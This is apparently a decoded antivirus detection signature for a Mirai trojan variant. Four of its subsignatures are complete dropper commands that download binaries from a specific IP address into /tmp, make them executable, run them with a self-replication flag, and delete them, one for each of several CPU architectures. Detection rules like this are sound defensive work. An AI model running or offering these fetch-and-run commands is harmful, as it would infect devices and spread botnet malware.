VIRUS NAME: Unix.Trojan.Mirai-9933833-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: (0|1|2|3)>1,2&4
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
cd /tmp; rm -rf garm7; wget http://198.46.161.135/garm7; chmod +x garm7; ./garm7 selfrep; rm -rf garm7
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
cd /tmp; rm -rf gmips; wget http://198.46.161.135/gmips; chmod +x gmips; ./gmips selfrep; rm -rf gmips
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
cd /tmp; rm -rf gppc; wget http://198.46.161.135/gppc; chmod +x gppc; ./gppc selfrep; rm -rf gppc
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
cd /tmp; rm -rf gsh4; wget http://198.46.161.135/gsh4; chmod +x gsh4; ./gsh4 selfrep; rm -rf gsh4
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
*$<#"'<#+'<#'%
